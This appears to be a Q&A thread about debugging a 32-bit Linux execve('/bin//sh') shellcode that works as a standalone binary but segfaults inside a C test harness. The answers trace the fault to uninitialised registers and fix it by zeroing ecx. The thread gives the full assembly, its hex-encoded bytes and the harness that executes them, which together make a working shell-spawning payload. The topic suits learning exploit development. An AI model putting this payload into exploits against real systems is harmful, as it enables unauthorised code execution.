# ASM working as is, but not in a C program

Tags: assembly, gdb, shellcode

I have this piece of ASM:

```
section .text
    global _start

_start:
    xor  eax, eax
    push eax         ; 0 to finish the /bin//sh string
    push 0x68732f2f  ; //sh
    push 0x6e69622f  ; /bin
    mov  ebx, esp
    mov  al, 0xb
    int  0x80
```

Which works fine if I do:

```
$ nasm -f elf shellcode.asm && ld -o shellcode shellcode.o
$ ./shellcode
$ # the new shell
```

But now, with the hex translation:

```
$ objdump -s shellcode

shellcode:     file format elf32-i386

Contents of section .text:
  8048060 31c05068 2f2f7368 682f6269 6e89e3b0  1.Ph//shh/bin...
  8048070 0bcd80                               ...
```

Used here:

```
const char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80";

int main(){
    (*(void(*)()) shellcode)();
    return 0;
}
```

The result is:

```
$ gcc -o shellcode shellcode.c
$ ./shellcode
Segmentation fault
```

I tried to practice my ASM and re-create the one [provided here](http://shell-storm.org/shellcode/files/shellcode-827.php). The difference, which I can't explain, is that on his payload, he's pushing the an extra `0` and the address of the `/bin//sh` string into the stack.

I though that because I was using the fastcall convention, I didn't have to setup the stack, but apparently there's more going on here.

Does anyone know why the shellcode refuses to run and why setting the stack changes "correct" it?

---

Edits:

When I try to run the program from `gdb` I have the following result:

```
$ gdb ./shellcode
(gdb) run
Program received signal SIGSEGV, Segmentation fault.
0x080484b3 in shellcode ()
```

And here's the `readelf` command output:

```
$ readelf -l -S shellcode
There are 30 section headers, starting at offset 0x1150:

Section Headers:
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  [ 1] .interp           PROGBITS        08048154 000154 000013 00   A  0   0  1
  [ 2] .note.ABI-tag     NOTE            08048168 000168 000020 00   A  0   0  4
  [ 3] .note.gnu.build-i NOTE            08048188 000188 000024 00   A  0   0  4
  [ 4] .gnu.hash         GNU_HASH        080481ac 0001ac 000020 04   A  5   0  4
  [ 5] .dynsym           DYNSYM          080481cc 0001cc 000040 10   A  6   1  4
  [ 6] .dynstr           STRTAB          0804820c 00020c 000045 00   A  0   0  1
  [ 7] .gnu.version      VERSYM          08048252 000252 000008 02   A  5   0  2
  [ 8] .gnu.version_r    VERNEED         0804825c 00025c 000020 00   A  6   1  4
  [ 9] .rel.dyn          REL             0804827c 00027c 000008 08   A  5   0  4
  [10] .rel.plt          REL             08048284 000284 000010 08   A  5  12  4
  [11] .init             PROGBITS        08048294 000294 000023 00  AX  0   0  4
  [12] .plt              PROGBITS        080482c0 0002c0 000030 04  AX  0   0 16
  [13] .text             PROGBITS        080482f0 0002f0 000192 00  AX  0   0 16
  [14] .fini             PROGBITS        08048484 000484 000014 00  AX  0   0  4
  [15] .rodata           PROGBITS        08048498 000498 00001c 00   A  0   0  4
  [16] .eh_frame_hdr     PROGBITS        080484b4 0004b4 00002c 00   A  0   0  4
  [17] .eh_frame         PROGBITS        080484e0 0004e0 0000b0 00   A  0   0  4
  [18] .init_array       INIT_ARRAY      08049f08 000f08 000004 00  WA  0   0  4
  [19] .fini_array       FINI_ARRAY      08049f0c 000f0c 000004 00  WA  0   0  4
  [20] .jcr              PROGBITS        08049f10 000f10 000004 00  WA  0   0  4
  [21] .dynamic          DYNAMIC         08049f14 000f14 0000e8 08  WA  6   0  4
  [22] .got              PROGBITS        08049ffc 000ffc 000004 04  WA  0   0  4
  [23] .got.plt          PROGBITS        0804a000 001000 000014 04  WA  0   0  4
  [24] .data             PROGBITS        0804a014 001014 000008 00  WA  0   0  4
  [25] .bss              NOBITS          0804a01c 00101c 000004 00  WA  0   0  1
  [26] .comment          PROGBITS        00000000 00101c 00002b 01  MS  0   0  1
  [27] .shstrtab         STRTAB          00000000 001047 000106 00      0   0  1
  [28] .symtab           SYMTAB          00000000 001600 000430 10     29  45  4
  [29] .strtab           STRTAB          00000000 001a30 00024e 00      0   0  1
Key to Flags:
  W (write), A (alloc), X (execute), M (merge), S (strings)
  I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown)
  O (extra OS processing required) o (OS specific), p (processor specific)

Elf file type is EXEC (Executable file)
Entry point 0x80482f0
There are 9 program headers, starting at offset 52

Program Headers:
  Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
  PHDR           0x000034 0x08048034 0x08048034 0x00120 0x00120 R E 0x4
  INTERP         0x000154 0x08048154 0x08048154 0x00013 0x00013 R   0x1
      [Requesting program interpreter: /lib/ld-linux.so.2]
  LOAD           0x000000 0x08048000 0x08048000 0x00590 0x00590 R E 0x1000
  LOAD           0x000f08 0x08049f08 0x08049f08 0x00114 0x00118 RW  0x1000
  DYNAMIC        0x000f14 0x08049f14 0x08049f14 0x000e8 0x000e8 RW  0x4
  NOTE           0x000168 0x08048168 0x08048168 0x00044 0x00044 R   0x4
  GNU_EH_FRAME   0x0004b4 0x080484b4 0x080484b4 0x0002c 0x0002c R   0x4
  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x10
  GNU_RELRO      0x000f08 0x08049f08 0x08049f08 0x000f8 0x000f8 R   0x1

 Section to Segment mapping:
  Segment Sections...
   00
   01     .interp
   02     .interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame
   03     .init_array .fini_array .jcr .dynamic .got .got.plt .data .bss
   04     .dynamic
   05     .note.ABI-tag .note.gnu.build-id
   06     .eh_frame_hdr
   07
   08     .init_array .fini_array .jcr .dynamic .got
```

---

Comparison with [this shellcode](http://shell-storm.org/shellcode/files/shellcode-827.php):

Here're the differences:

```
Hamza (working)     |   me

ASM

xor    eax, eax     |   xor    eax, eax
push   eax          |   push   eax
push   0x68732f2f   |   push   0x68732f2f
push   0x6e69622f   |   push   0x6e69622f
mov    ebx, esp     |   mov    ebx, esp
push   eax          |
push   ebx          |
mov    esp, ecx     |
mov    al, 0xb      |   mov    al, 0xb
int    0x80         |   int    0x80

Stack before the interrupt (each line is a word)

&(/bin//sh)         | /bin
0                   | //sh
/bin                | 0
//sh                |
0                   |

Registers before the interrupt

eax    0xb          |   0xb
ebx    &(/bin//sh)  |   &(/bin//sh)
ecx    esp          |   ?
```

As you can see, the stack changes by having the string's address and an extra `0`, and his `ecx` register is set to the last `esp` value. And those differences make his shellcode to work (both direcly with `nasm` & `ld` and inside the `C` program, without any change).

---

Edit:

Some progress, there's one extra instruction when the payload run within the C program:

```
(gdb)  x/14i 0x80484a0
   ...
   0x80484b3 <shellcode+19>:    mov    $0xb,%al
   0x80484b5 <shellcode+21>:    int    $0x80
   0x80484b7 <shellcode+23>:    add    %al,(%ecx)
```

While I don't know (yet) why the `ecx` register is incremented with the return value of the interrupt, clearing the register with `xor ecx, ecx` fixes the issue.

Here's the working asm:

```
section .text
    global _start

_start:
    xor  eax, eax
    push eax
    push 0x68732f2f
    push 0x6e69622f
    mov  ebx, esp
    xor  ecx, ecx
    mov  al, 0xb
    int  0x80
```

Comment: possibly your string bin,sh doesnt have a null terminator and push 0 is fulfilling it

Comment: afaik it does, that's why I `push eax` the first time...

Comment: is your data section executable? post output of `readelf -l -S`.What does `gdb` say when you run the compiled program under it?

Comment: Hey @IgorSkochinsky: see my edit. It seems that my `.data` is writable and allocable but not executable. Could it be it? Also when I try to `readelf` from the asm-generated executable, I only have the `.text` header that is executable.

Comment: so according to gdb it does run. what do you mean by "setting the stack changes "correct" it"?

Comment: @IgorSkochinsky: see my last edit, I've added a comparison. Does it make more sense?

Comment: remove "const" or search the same question https://stackoverflow.com/questions/15593214/linux-shellcode-hello-world

Answer (score 6, accepted):

The problem with you shellcode and the why it differs if you run from C program or not is the initial values.

The registers that are used when executing [execv](http://syscalls.kernelgrok.com/) (second page) are:

- `eax` = 0x0b
- `ebx` = ptr to filename
- `ecx` = ptr to argv
- `edx` = ptr to environment variables

But actually the important one are only `ebx` and `eax` and the two other we can nullify.

If you run your shellcode only the default value for the registers is `0x0` so we are getting nullification of `ecx` & `edx` for free.

[image]

it's not the case when you execute your shellcode from C program.

[image]

As you can see registers has already some initial values so you need to prepare them correctly. This is why adding `xor ecx,ecx` fixes the issue.

As for the example that you took from `ecx` is assigned to stack pointer but on the stack there's a value that points to "/bin/sh" which is also ok (and probably even better than `0x00`)

Answer (score 3):

Okay, so according to `gdb` the shellcode does run, so it's probably placed into `.text`. You should try to step through the shellcode (e.g. using `stepi`) to see on what instruction it faults.

Comment: OK I did that and there is an extra instruction on the payload, I'll post an update.